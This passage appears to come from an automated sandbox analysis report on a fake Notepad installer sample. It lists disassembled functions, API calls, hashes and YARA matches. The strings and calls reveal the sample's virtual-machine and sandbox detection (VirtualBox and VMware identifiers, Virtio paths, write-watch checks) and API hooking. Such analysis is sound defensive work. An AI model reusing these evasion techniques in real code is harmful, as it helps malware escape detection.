                                      • Opcode Fuzzy Hash: c37ec6df34994478f209798cf6c1c01fc76b0ee9532dd30ee10e9bee43fdaa8d
                                      • Instruction Fuzzy Hash: AAF0653274231EB6D700966A9C42DBA2BAF4E86FE47024026FE05F6192E661D90397B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406880 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-3916222277
                                      • Opcode ID: dced49d9d8e3a5c8bea334ee0000a9fa209dacc67b99723163d93db5d258233c
                                      • Instruction ID: b0fabc89c6687b5b66766351c75e5e04b69d7b88fcf5b889cf2e489d489982cb
                                      • Opcode Fuzzy Hash: dced49d9d8e3a5c8bea334ee0000a9fa209dacc67b99723163d93db5d258233c
                                      • Instruction Fuzzy Hash: D6614BB59043168FC710DF18C48065ABBE1FF89314F09892DE989A7355E339E956CF82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA2F9 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA31A
                                      • VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000040), ref: 006EA331
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA342
                                      • ResetWriteWatch.KERNEL32(00000000,01000000), ref: 006EA387
                                      • GetWriteWatch.KERNEL32(00000000,00000000,00001000,?,?,?), ref: 006EA3B1
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA3DC
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006EA3E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$AllocWatchWrite$Reset
                                      • String ID:
                                      • API String ID: 3544933417-0
                                      • Opcode ID: 92906e4638f5111e12786b05f42839d045dedbb27dd7615661e341d52e746fd3
                                      • Instruction ID: 5257d3ce89104d9a7a56e89d99116bd2e9c35073006bb3bb32966834b8ab2a36
                                      • Opcode Fuzzy Hash: 92906e4638f5111e12786b05f42839d045dedbb27dd7615661e341d52e746fd3
                                      • Instruction Fuzzy Hash: 0731F570905389FFD7219FA98C88FAEBFAAEB05310F244569E551E72D0D6706E41CF20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB75A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 94COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrIW.SHLWAPI(?,PCI\VEN_80EE&DEV_CAFE), ref: 006EB7FC
                                      • VariantClear.OLEAUT32(00000008), ref: 006EB80D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$ROOT\CIMV2$SELECT * FROM Win32_PnPEntity
                                      • API String ID: 261499160-736241479
                                      • Opcode ID: 4ed91df39edeca2c08dfb56d3f89eb047897585b672c6a441ca4113064fb1e75
                                      • Instruction ID: 02c01b0192d7907261f0f1b3b73baaeb9d64cf2643c95c3fbc5f4e73d51e8dcb
                                      • Opcode Fuzzy Hash: 4ed91df39edeca2c08dfb56d3f89eb047897585b672c6a441ca4113064fb1e75
                                      • Instruction Fuzzy Hash: AB313876E01219AFCB10DB95C944DEFBBBEEF48700B1040A9F516E7290DB719E45CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E3CA3 Relevance: 10.6, APIs: 7, Instructions: 89networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _alloca_probe.NTDLL ref: 006E3CC2
                                      • memcpy.NTDLL(?,?,?), ref: 006E3CCE
                                      • memset.NTDLL ref: 006E3CE3
                                      • getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 006E3D06
                                      • memcpy.NTDLL(000000E0,?,?,?,00000000,?,00000000), ref: 006E3D52
                                      • htons.WS2_32(?), ref: 006E3D6F
                                      • FreeAddrInfoW.WS2_32(00000000), ref: 006E3D86
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$AddrFreeInfo_alloca_probegetaddrinfohtonsmemset
                                      • String ID:
                                      • API String ID: 1797924349-0
                                      • Opcode ID: 4a636bfce9cafd1ca28561b6ccefc3f8347b8c933e92c7f7f432594b3e7901e5
                                      • Instruction ID: 86e6ab0b22d27abe1d703d717b1a374c314041cb1affd4743275edec675a1bc3
                                      • Opcode Fuzzy Hash: 4a636bfce9cafd1ca28561b6ccefc3f8347b8c933e92c7f7f432594b3e7901e5
                                      • Instruction Fuzzy Hash: 87318F75901349AFCB24DF9ACC89ADEB7BAFF44310F148459E40597212D370EE46CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC245 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$mallocmemset
                                      • String ID: IPCA$VMWARE
                                      • API String ID: 1993750426-2504121799
                                      • Opcode ID: 842a017b8561733b6f8374507291c33cfec99736fb3c785ffec11a3f809bfb2d
                                      • Instruction ID: 59c24093ec0fdf60cf5d1ab0f39b70589547ac2d47a614170600a58fc41a237f
                                      • Opcode Fuzzy Hash: 842a017b8561733b6f8374507291c33cfec99736fb3c785ffec11a3f809bfb2d
                                      • Instruction Fuzzy Hash: B411B471902385BFEB1167E68C45BEE767BDF45330F200059FA01B2281D7754B029AA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E911C Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FirmwareSystemTablememset$??3@mallocrealloc
                                      • String ID:
                                      • API String ID: 920115187-0
                                      • Opcode ID: b28ecc184075fc7d53ce4974af864b9e6d16f4a0981ca591aca3228bfaa0c98c
                                      • Instruction ID: 6515fa83ce59c057def571f56ec8608844e17a9d4f954c02d90ef35a4db8e4dd
                                      • Opcode Fuzzy Hash: b28ecc184075fc7d53ce4974af864b9e6d16f4a0981ca591aca3228bfaa0c98c
                                      • Instruction Fuzzy Hash: 7511A1766023967FE7211FA7EC48EDB3E5FEF857A1B104029F90892211DB718C04C6B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E6085 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53memorylibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(?,ZwQueryInformationProcess), ref: 006E6093
                                      • VirtualProtect.KERNEL32(00000001,00000004,00000040,?,006E603C,00000000,?,?,?,?), ref: 006E60DB
                                      • InterlockedExchange.KERNEL32(?,<`n), ref: 006E60EA
                                      • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,?,?,?,00000000), ref: 006E60FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual$AddressExchangeInterlockedProc
                                      • String ID: <`n$ZwQueryInformationProcess
                                      • API String ID: 1726986358-2338439428
                                      • Opcode ID: d461bd97d739b06b06ae51ea06364af8e2cc7e452872e8901b3e2618bebf127f
                                      • Instruction ID: 35ea8469872ec6245a7d957639248414e56266c2412d8d0adefc661f4c56b01e
                                      • Opcode Fuzzy Hash: d461bd97d739b06b06ae51ea06364af8e2cc7e452872e8901b3e2618bebf127f
                                      • Instruction Fuzzy Hash: B301803220125ABBDF214FA6CD45FEA3F6AEB64790F040025FA18962A0D672D961CBD4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB3F8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(00000104,?,00000000,00020019,?,00000004,8Uo), ref: 006EB437
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000104), ref: 006EB454
                                      • StrStrIW.SHLWAPI(?,?), ref: 006EB468
                                      • RegCloseKey.ADVAPI32(?), ref: 006EB475
                                      • RegCloseKey.ADVAPI32(?), ref: 006EB483
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$OpenQueryValue
                                      • String ID: 8Uo
                                      • API String ID: 1607946009-3489183970
                                      • Opcode ID: 756d7c7f59d8fc1e13ad0f3b87325f1a4abc5fea0589d82995314894780a5329
                                      • Instruction ID: 44e3b651c817819eb920be0a5453e1d125967821fc77ca418af026ce56e75ad7
                                      • Opcode Fuzzy Hash: 756d7c7f59d8fc1e13ad0f3b87325f1a4abc5fea0589d82995314894780a5329
                                      • Instruction Fuzzy Hash: A211393260121AFBDF518FA1DC08AEB7BBAFF04354F109465F945E1160EB309A94DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7907 Relevance: 10.5, APIs: 3, Strings: 4, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: cache-diges$content-typ$max-forward$pEo
                                      • API String ID: 1475443563-637431819
                                      • Opcode ID: 9b2f6c2803e0ffd616f5e8db17542ad13300aeb5bc492c96aecc645fdd236d64
                                      • Instruction ID: e8e1098fa1c0133cfca9d7e744a13c53b669f08bf96e9c445a3e0888f3a5d57c
                                      • Opcode Fuzzy Hash: 9b2f6c2803e0ffd616f5e8db17542ad13300aeb5bc492c96aecc645fdd236d64
                                      • Instruction Fuzzy Hash: 58F08C5575E3C431D274963B1D42B7B2E4B6B5176AF050AA5FE44EC383EA82CE034140
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E359D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,006E2BCD), ref: 006E35B3
                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E35BF
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,006E2BCD), ref: 006E35D2
                                      • IsWow64Process.KERNEL32(00000000,?,006E2BCD), ref: 006E35D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleModuleProcWow64
                                      • String ID: IsWow64Process$kernel32.dll
                                      • API String ID: 1745181078-3024904723
                                      • Opcode ID: 9c4c362748a2a59ea45f03a05671e1191ac086f8e51d501c3a0f718aedd86ca6
                                      • Instruction ID: d9db0f9123b53722c86b97e14686459c0d969e56602fb1c02a2f75ccebc64d6d
                                      • Opcode Fuzzy Hash: 9c4c362748a2a59ea45f03a05671e1191ac086f8e51d501c3a0f718aedd86ca6
                                      • Instruction Fuzzy Hash: 79F01C71601359ABDB118FAAEC0D7AA37EAA70070AF406455F541D2390DBB4CA40CA10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F28D5 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 158stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.NTDLL ref: 006F28EA
                                      • strchr.NTDLL ref: 006F292F
                                      • strchr.NTDLL ref: 006F2945
                                      • memcpy.NTDLL(00000017,?,00000010,?,?,?,006F27F7,00000017,006F168C,?,006F168C,00000017), ref: 006F2A54
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strchr$memcpymemset
                                      • String ID: 0123456789ABCDEF$0123456789abcdef
                                      • API String ID: 2695381868-885041942
                                      • Opcode ID: 37036d20a617368432501d7a6342f37571cc3925339b5736c659cd42f789eb72
                                      • Instruction ID: 1410029ab08303328b02573a84165651a7b6d3d6d506b397460f2ce1efc7e17c
                                      • Opcode Fuzzy Hash: 37036d20a617368432501d7a6342f37571cc3925339b5736c659cd42f789eb72
                                      • Instruction Fuzzy Hash: 53518C3190025F9BCF25CFA9C8A05FEBBB6EB95324F14406AD685A7341D7709A85CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA040 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA05E
                                      • VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000004), ref: 006EA074
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA085
                                      • GetWriteWatch.KERNEL32(00000000,00000000,00001000,?,?,?), ref: 006EA0AB
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA0D7
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006EA0DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$Alloc$WatchWrite
                                      • String ID:
                                      • API String ID: 2642962992-0
                                      • Opcode ID: d31573e06960b24a08c5f45eab37922f2cae3fb4308f946d0af708343d1974b5
                                      • Instruction ID: b672967bbe1b90b97d042a0ea69597de19ff5e037a1adfceec8b5f953579a62e
                                      • Opcode Fuzzy Hash: d31573e06960b24a08c5f45eab37922f2cae3fb4308f946d0af708343d1974b5
                                      • Instruction Fuzzy Hash: 1E11C671A00348BBDB219BA58C45FAF7FBEEB88744F208455F601B21C0DAB06E01DF25
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E68D5 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.NTDLL ref: 006E6902
                                      • VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000002), ref: 006E6930
                                      • VerifyVersionInfoW.KERNEL32(00000000,00000002,00000000), ref: 006E6949
                                      • VerSetConditionMask.NTDLL(?,00000000,00000002,00000001), ref: 006E695C
                                      • VerSetConditionMask.NTDLL(00000000,?,00000001,00000002), ref: 006E6964
                                      • VerifyVersionInfoW.KERNEL32(00000000,00000003,00000000), ref: 006E6971
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion$memset
                                      • String ID:
                                      • API String ID: 717955072-0
                                      • Opcode ID: 615d97cc650fa6926bc2dac0601d4900cb8e853fc751ce95053200c3a531bedf
                                      • Instruction ID: 02a120ddb8f7dd9ca5efd4f5a49cdd2a1c69c113bc5b87a90ff8f9d1b077d525
                                      • Opcode Fuzzy Hash: 615d97cc650fa6926bc2dac0601d4900cb8e853fc751ce95053200c3a531bedf
                                      • Instruction Fuzzy Hash: 391133B2E403187BEB209B65DC06FDA7BBDAB48710F0044A6B648EB1C1D6B09A548F94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E806B Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: XJo$`Jo$http:$https:
                                      • API String ID: 1475443563-3692409251
                                      • Opcode ID: 3bd913136fa5b36a979939edbb7384a75980492ab97387d5362a9100323568d8
                                      • Instruction ID: abf2c985349e4296557c64387ace9154d5656fb79794e7a14ec3db6c9b419cf7
                                      • Opcode Fuzzy Hash: 3bd913136fa5b36a979939edbb7384a75980492ab97387d5362a9100323568d8
                                      • Instruction Fuzzy Hash: 4FF0E9319053906EC250DE2EDC41B7BB3EB6B81710F024429FE1CE7246EB70EC0A8676
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405910 Relevance: 9.0, APIs: 7, Instructions: 280COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: malloc$callocmemcpy
                                      • String ID:
                                      • API String ID: 258562675-0
                                      • Opcode ID: 7bc7ee0a0ce9abe937728008df5534e06bbb984e703addabb81682a630baa7bd
                                      • Instruction ID: 4a2de19946ac4d64cba486b2855c882687a4ee0d90feb334a3c29af14f585094
                                      • Opcode Fuzzy Hash: 7bc7ee0a0ce9abe937728008df5534e06bbb984e703addabb81682a630baa7bd
                                      • Instruction Fuzzy Hash: A6D19AB4A087419FC714DF29C184A5BBBE1FF89344F51892EE989A7350E738E854CF86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7CD7 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: 4Do$PEo$content-dispositio$if-unmodified-sinc
                                      • API String ID: 1475443563-2677543615
                                      • Opcode ID: f9c52bbf97889fe126d8f427d0394a7ac582c2ef583e55cc5ab1e9810324cb5c
                                      • Instruction ID: eb78aefe7c84849275896ac020defa50e5cbf3dbd6370344d0224b6ad91ba3c8
                                      • Opcode Fuzzy Hash: f9c52bbf97889fe126d8f427d0394a7ac582c2ef583e55cc5ab1e9810324cb5c
                                      • Instruction Fuzzy Hash: 3BE0261878E3C831C664652A1C82BF71F4B2F61326F4004A6FE449D3C3E641CC436040
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E94C5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 006E952C
                                      • VerSetConditionMask.NTDLL(00000000), ref: 006E9530
                                      • VerSetConditionMask.NTDLL(00000000), ref: 006E9534
                                      • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 006E955D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion
                                      • String ID: $Bn
                                      • API String ID: 2793162063-2822788854
                                      • Opcode ID: 9239b5f2eeaae4e68017a27718b0482bb3588e363880a0e2f41c3b9b7858d6a3
                                      • Instruction ID: e3e5dd042d3d1b7bc455cf33468e91bc42521491e8e048e8a8b2ca79ddab5918
                                      • Opcode Fuzzy Hash: 9239b5f2eeaae4e68017a27718b0482bb3588e363880a0e2f41c3b9b7858d6a3
                                      • Instruction Fuzzy Hash: EA112871D4061DBADB24DF65DC16BEABAB8EF98700F008499A209E7190E6B05780CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9354 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                      • SysAllocString.OLEAUT32(?), ref: 006E936C
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree
                                      • String ID: WQL
                                      • API String ID: 344208780-1249411209
                                      • Opcode ID: 7422a48a79fa459153e1dd5f9afc619b76772ce812176ce9642cd6fbdf2ed443
                                      • Instruction ID: 128782bc95ec668523a522cd03951c4df7848750ef47e8e77443e17224e43ccb
                                      • Opcode Fuzzy Hash: 7422a48a79fa459153e1dd5f9afc619b76772ce812176ce9642cd6fbdf2ed443
                                      • Instruction Fuzzy Hash: A9010531201249AFDB10DF9ADC88BAA7BBAEF88755F100069F9059B350CB71AC11CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC717 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E98DD: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                        • Part of subcall function 006E98DD: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                        • Part of subcall function 006E98DD: GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 006EC75B
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 006EC770
                                      • PathCombineW.SHLWAPI(?,?,?), ref: 006EC78B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$AddressCombineCurrentEnvironmentExpandFolderHandleModuleProcProcessSpecialStrings
                                      • String ID: %ProgramW6432%$Virtio-Win\
                                      • API String ID: 949058988-231023017
                                      • Opcode ID: 9363cd130691b33e1e2c8f8fc0fa1919dda84874bf571e6e6c10045f62f996f6
                                      • Instruction ID: 1c22299fd3d4779d2faa6ec7812860ad4f40e760d3d423fc3fdc4cb9e751ed36
                                      • Opcode Fuzzy Hash: 9363cd130691b33e1e2c8f8fc0fa1919dda84874bf571e6e6c10045f62f996f6
                                      • Instruction Fuzzy Hash: 6701A27290131EAAEF609A60DC49FEB777EEB44711F0004A2B615E70D0DBB09AC5CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E98DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: IsWow64Process$kernel32.dll
                                      • API String ID: 4190356694-3024904723
                                      • Opcode ID: fe531d5a9f40b6b69e5adf7b66dd2f253aad707ed1a1dfa9e18669d0f970cb59
                                      • Instruction ID: 46f402923884a4485bd78926294a0b03cdb42049fbaec55d3fa978599b265948
                                      • Opcode Fuzzy Hash: fe531d5a9f40b6b69e5adf7b66dd2f253aad707ed1a1dfa9e18669d0f970cb59
                                      • Instruction Fuzzy Hash: ABF01CB1A02309EBDB108BA6ED0E7EA37EEAF0070BF042459E505D2290D7B8C640CA21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409D60 Relevance: 7.6, APIs: 5, Instructions: 140COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 60%
                                      			E00409D60() {
				void* _t37;
				unsigned int _t42;
				void* _t43;
				unsigned int _t46;
				void* _t48;
